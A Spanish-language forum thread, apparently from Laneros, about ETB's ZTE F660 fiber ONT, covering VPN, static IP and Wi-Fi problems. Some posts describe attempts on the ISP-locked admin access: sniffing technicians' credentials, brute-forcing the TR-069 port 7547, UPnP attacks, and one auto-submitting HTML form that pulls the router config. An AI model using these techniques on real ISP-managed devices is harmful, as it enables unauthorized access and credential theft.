Todo sobre GPON ONT ZTE F660 de ETB Fibra

cavarca dijo:
Una idea... Entre los laneros que cuentan con acceso al ONT podrían verificar si las configuraciones son significativamente diferentes entre ustedes? Si las configuraciones son las mismas, o varían únicamente las configuraciones de IPs / Subnet que se pueden obtener desde Status -> Network Interface -> WAN Connection con el usuario de WIFIetb tal vez podríamos hacerle un Factory Reset al aparato y reconfigurarlo desde cero, definiendo la contraseña de admin.

Lo ideal sería comparar los config.bin al pasarlos por el RouterPassView... Que opinan? Sería viable?
Haz clic para expandir...
El problema es primero buscar como hacer el Factory reset, pero para eso tienes que sacar antes el usuario y contraseña de PPPoE que es diferente entre todos los usuarios y una razón mas para no compartir los config.bin porque tienen los datos de autenticacion personales.
 
AzureSky dijo:
El problema es primero buscar como hacer el Factory reset, pero para eso tienes que sacar antes el usuario y contraseña de PPPoE que es diferente entre todos los usuarios y una razón mas para no compartir los config.bin porque tienen los datos de autenticacion personales.
Haz clic para expandir...
El factory reset se puede hacer mediante el botón físico del ont, el problema es que el 660 plus ya trae por defecto el pass que se desconoce, y aún así, si se lograra meter al ont recién hecho el reset, éste se autoactualiza y cierra la sesión de una, haciéndolo inaccesible de nuevo, si al autoactualizarse cambia el pass, porque si no lo cambia, antes de que se autoactualice sería sacar el config y mirar el pass con el programa, o incluso activar el telnet.
Hay varias razones para no compartir el config.bin, tiene la autenticación pon, tiene la autenticación pppoe, tiene la configuración (si, incluido el # de teléfono) de tu linea telefónica, tiene la configuración de la tv, que en algunos casos es diferente en algunos usuarios.
 
  • Me gusta
Reacciones: AzureSky
Dr. Iguazo dijo:
Ojala alguien averigue pronto el password del ZXHN F660E Plus, porque por alguna razon no me permite conectarme a las VPN de la oficina, lo cual es un problema grave para mi pues trabajo desde la casa; los genios de soporte tecnico dicen que es mi computador, pero se que no es asi, pues un familiar vive en este mismo edificio y si uso el internet de él (tambine fibra ETB, pero con router F660) no tengo inconvenientes :dead:

Alguien ha experimentado este tipo de problemas?
Haz clic para expandir...
Tengo el mismo problema, tenia los servicios de fibra optica en otro inmueble y funcionaba correctamente la VPN, ahora, al trasladar los servicios me dejaron ese modem ZTE F660E Plus, solicite que escalaran mi caso, esperar manana que respuesta tienen.

Tu has podido resolver algo?
 
cduarte dijo:
Tengo el mismo problema, tenia los servicios de fibra optica en otro inmueble y funcionaba correctamente la VPN, ahora, al trasladar los servicios me dejaron ese modem ZTE F660E Plus, solicite que escalaran mi caso, esperar manana que respuesta tienen.

Tu has podido resolver algo?
Haz clic para expandir...

Si; despues de probar opciones, usar SSTP me solucionó el problema. Solo debe seleccionar SSTP como el tipo de VPN que Windows usará, obviamente ese protocolo debe soportarlo la VPN remota a la que desea conectarse. Los genios de soporte de ETB me sugirieron comprar el servicio de IP fija, pues segun ellos no soportan VPN sin ese costo/paquete adicional.
 
Dr. Iguazo dijo:
Si; despues de probar opciones, usar SSTP me solucionó el problema. Solo debe seleccionar SSTP como el tipo de VPN que Windows usará, obviamente ese protocolo debe soportarlo la VPN remota a la que desea conectarse. Los genios de soporte de ETB me sugirieron comprar el servicio de IP fija, pues segun ellos no soportan VPN sin ese costo/paquete adicional.
Haz clic para expandir...
Gracias por tu respuesta, el cliente de VPN que uso es FortiClient, este solo permite dos tipos de conexiones: SSL-VPN y IPsec-VPN, la he conectado por IPsec-VPN siempre y había funcionado, hasta que llegó este módem, algún tip que me pueda ayudar?
 
cduarte dijo:
Gracias por tu respuesta, el cliente de VPN que uso es FortiClient, este solo permite dos tipos de conexiones: SSL-VPN y IPsec-VPN, la he conectado por IPsec-VPN siempre y había funcionado, hasta que llegó este módem, algún tip que me pueda ayudar?
Haz clic para expandir...
Hoy me solucionaron el problema en ETB, dí la IP de FortiGate y que abrieran los puertos UDP 500, 4500 y TCP/IP 50, me dijo la de soporte que tenían que escalar para habilitar las funciones de la VPN, y al parecer esta vez si pudieron. Espero está información te sirva.
 
  • Me gusta
Reacciones: SebastIAS
Buen Día Laneros!!!

Tengo servicio de ETB Fibra, necesito configurar mi IP como estatica, ya que esá cambiando a cada rato y pierdo permisos de acceso a aplicativos de mi trabajo....

Llame a ETB pero me dicen que tiene un costo de 12mil al mes más una visita de 35mil.

Alguien sabe de alguna otra forma de configurar esto sin la realización de ese pago?

Gracias

Mauricio Ch
 
SMCHAVARRY dijo:
Buen Día Laneros!!!

Tengo servicio de ETB Fibra, necesito configurar mi IP como estatica, ya que esá cambiando a cada rato y pierdo permisos de acceso a aplicativos de mi trabajo....

Llame a ETB pero me dicen que tiene un costo de 12mil al mes más una visita de 35mil.

Alguien sabe de alguna otra forma de configurar esto sin la realización de ese pago?

Gracias

Mauricio Ch
Haz clic para expandir...

Poner su propio router Asus o Netgear y usar el DNS dinámico gratis que ofrecen esas dos marcas. Cada vez que cambie de IP, el router se encarga de actualizar su sub-dominio.

Para Asus es misubdominio.asuscomm.com
Parta NETGEAR es misubdominio.mynetgear.com

Si tiene su propio dominio, puede crear un registro CNAME que apunte a estos subdominios gratuitos y así los enmascara.

De esa forma puede conectar sus clientes FTP, cámaras IP, navegadores etc a su casa ya no con una IP sino con una dirección de Internet.

No le regale esos 12mil a ETB.
 
  • Me gusta
Reacciones: SebastIAS
Hola Laneros, he estado haciendo varias pruebas para lograr sacar dicha clave (F660 ZTE), les describo algunos de mis hallazgos:
  • El telnet viene desactivado por defecto, incluso si se configura una DMZ a través del Hellcenter, dicho puerto (23) queda bloqueado.
  • Los únicos puertos abiertos son: 80 (http), 443 (https) y el 53 (dns) -Aunque no he hecho un full scan-. Por lo que puedo concluir que los que gestionan el equipo (servicio técnico) usan puertos no convencionales para configuración o lo hacen a través de http(s).
  • Al intentar cargar las demás páginas de configuración del equipo (Inyección Html) desde la sesión de WifiETB, se cierra la sesión.
  • La clave de la interfaz web viaja en texto claro a través de la red, lo que puede permitir un ataque de Man in the Middle.
Debido a lo anterior, acabo de montar Kali Linux para hacer sniffing de dichas claves a través de todas las IP del WAN y del LAN asociadas al router. Voy a llamar a hacer una pequeña configuración con el fin de que intenten ingresar al modem y poder sacar alguna credencial.

Cualquier cosa les comunico.

Saludos.
 
ADVERTENCIA! problemas con el WIFI?

Hace poco me instalaron fribra con ese tal ZTE F660 Plus -dos antenas-. El WIFI nunca me ha funcionado bien se perdia la red o si se conectaba no habia internet. Despues de mas de treinta llamadas al fin mandaron un tecnico. Resulta que este F660 plus no puede estar ubicado cerca a otros aparatos -- Radio, soundbar, swich etc...-- porque hay interferncia con la frequencia del wifi. El reemplaso que me trajieron tenia exactamente el mismo problema.

Que tal esa.

Anteriormente yo tenia el normalito ZTE F660 -una antenna- en el mismo sitio y jamas tuve problema.


Que pesima calidad del ZTE F660 Plus, y la ETB, como si no supiera que hay algun problema.
 
  • Me enoja
Reacciones: rpzqkfgw
henryfvargas22 dijo:
Hola Laneros, he estado haciendo varias pruebas para lograr sacar dicha clave (F660 ZTE), les describo algunos de mis hallazgos:
  • El telnet viene desactivado por defecto, incluso si se configura una DMZ a través del Hellcenter, dicho puerto (23) queda bloqueado.
  • Los únicos puertos abiertos son: 80 (http), 443 (https) y el 53 (dns) -Aunque no he hecho un full scan-. Por lo que puedo concluir que los que gestionan el equipo (servicio técnico) usan puertos no convencionales para configuración o lo hacen a través de http(s).
  • Al intentar cargar las demás páginas de configuración del equipo (Inyección Html) desde la sesión de WifiETB, se cierra la sesión.
  • La clave de la interfaz web viaja en texto claro a través de la red, lo que puede permitir un ataque de Man in the Middle.
Debido a lo anterior, acabo de montar Kali Linux para hacer sniffing de dichas claves a través de todas las IP del WAN y del LAN asociadas al router. Voy a llamar a hacer una pequeña configuración con el fin de que intenten ingresar al modem y poder sacar alguna credencial.

Cualquier cosa les comunico.

Saludos.
Haz clic para expandir...

Hice mis pruebas pero hicieron la gestión a través del puerto 7547 (TR-069), por lo cual no pude capturar alguna credencial. Investigué un poco y se puede crear un servidor fake que simule dicho protocolo pero se requiere de mucha información sobre la configuración del protocolo en la red interna de ETB. El modo bridge solo lo están configurando cuando se tiene un pool de 5 IP's contratado, ni siquiera al tener IP fija dejan hacerle gestión.

De acuerdo a lo anterior, me doy cuenta que la IP interna de gestión tiene abierto el puerto 7547, el cual requiere de usuario y contraseña y permite múltiples intentos fallidos. Se podría crear un diccionario de ataque o reusar claves antiguas para ingresar. Es simplemente ingresar dicha IP en el navegador y ahí sale para ingresar credenciales.

-84.png


Me avisan si encuentran una clave.

Anexo la imagen de dónde sacar la IP con el puerto abierto y un ejemplo de cómo sale el login al ingresar dicha IP en el browser.

router-login-screen.png


Saludos
 
  • Me gusta
Reacciones: rpzqkfgw
henryfvargas22 dijo:
Hice mis pruebas pero hicieron la gestión a través del puerto 7547 (TR-069), por lo cual no pude capturar alguna credencial. Investigué un poco y se puede crear un servidor fake que simule dicho protocolo pero se requiere de mucha información sobre la configuración del protocolo en la red interna de ETB. El modo bridge solo lo están configurando cuando se tiene un pool de 5 IP's contratado, ni siquiera al tener IP fija dejan hacerle gestión.

De acuerdo a lo anterior, me doy cuenta que la IP interna de gestión tiene abierto el puerto 7547, el cual requiere de usuario y contraseña y permite múltiples intentos fallidos. Se podría crear un diccionario de ataque o reusar claves antiguas para ingresar. Es simplemente ingresar dicha IP en el navegador y ahí sale para ingresar credenciales.

Ver el archivos adjunto 303492

Me avisan si encuentran una clave.

Anexo la imagen de dónde sacar la IP con el puerto abierto y un ejemplo de cómo sale el login al ingresar dicha IP en el browser.

Ver el archivos adjunto 303491

Saludos
Haz clic para expandir...

Amigo estoy en las mismas tambien instale Kali a ver si logro sacar el pass por fuerza bruta, el usuario y pass que me dieron en laneros no funciona por el portal web pero me parece que el usuario no es valido, antes me salia usuario o clave erronea, ahora sale solo error en usuario voy a ver si por el puerto 7547 logro algo, cualquier novedad te ruego nos comentes por aca, yo hare lo mismo, saludos.
 
  • Me gusta
Reacciones: rpzqkfgw
lbonfante dijo:
Amigo estoy en las mismas tambien instale Kali a ver si logro sacar el pass por fuerza bruta, el usuario y pass que me dieron en laneros no funciona por el portal web pero me parece que el usuario no es valido, antes me salia usuario o clave erronea, ahora sale solo error en usuario voy a ver si por el puerto 7547 logro algo, cualquier novedad te ruego nos comentes por aca, yo hare lo mismo, saludos.
Haz clic para expandir...

Apenas encuentre alguna vulnerabilidad adicional te comento. De igual forma puse una queja formalmente en ETB para que me permitieran poner el módem en modo bridge, ya me respondieron que no y ya usé el recurso de apelación. Si no prospera, será llevarlo hasta la SIC jeje. Saludos
 
  • Me gusta
Reacciones: rpzqkfgw
henryfvargas22 dijo:
Apenas encuentre alguna vulnerabilidad adicional te comento. De igual forma puse una queja formalmente en ETB para que me permitieran poner el módem en modo bridge, ya me respondieron que no y ya usé el recurso de apelación. Si no prospera, será llevarlo hasta la SIC jeje. Saludos
Haz clic para expandir...
Bueno te comento que he intentado ataques de upnp pero me rechaza los cambios en configuración, segun mis conclusiones la administracion la hacen desde 10.2.0.0/20, estoy intentando engañar al ONT para que crea que tengo un equipo en esa red o verificar desde que red me responde apuntando directamente a la interfaz de administracion 10.2.x.x en mi caso.
 
lbonfante dijo:
Bueno te comento que he intentado ataques de upnp pero me rechaza los cambios en configuración, segun mis conclusiones la administracion la hacen desde 10.2.0.0/20, estoy intentando engañar al ONT para que crea que tengo un equipo en esa red o verificar desde que red me responde apuntando directamente a la interfaz de administracion 10.2.x.x en mi caso.
Haz clic para expandir...

Tengo entendido que es desde la de Gestión, una 10.11.x.x ya que esas de Nat y Sin Nat no están configuradas para los usuario con ip dinámica
 
Buenas noches,

Estuve buscando vulnerabilidades y encontré una que se puede encontrar abriendo el html que les suministro. Lo abren en el navegador y les descarga el config. Espero les sirva, particularmente en mi modem no funcionó.

Saludos.

HTML: 
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="
http://192.168.0.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch"
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</body>
</html>
 
Buen día. El día sábado 5 de agosto sobre las 12:30 pm tuve una visita técnica porque no tenía ningún servicio. El técnico revisó en mi casa y luego fué al poste en donde estaba el daño. Le pregunté al técnico que si es mejor el ont f660 plus (el de antenas) o el f660 (sin antenas externas, el que yo tengo), a lo cual me dice que el que yo tengo es mucho mejor, que por lo menos a él le había salido mucha visita por problemas y daños en el f660 plus, que en una instalaciópn de 8 días de hecha el f660 plus que había dejado ya se había quemado, y que tienden a dañarse rápido, que si yo tenía el f660 que lo dejara. Este es el segundo técnico que me dice que el f660 plus es malo. Les digo esto para los que tienen el f660 y hayan pensado alguna vez en cambiarlo por el f660 plus, dejen el f660, y para aquellos que tienen el f660 plus, pueden intentrar hablar con etb y pedir cambio de ont, y exigir el f660, si se los niegan háganlo con derecho de petición.
Saludos!
 

Los últimos mensajes

Los últimos temas

Arriba Pie
Atrás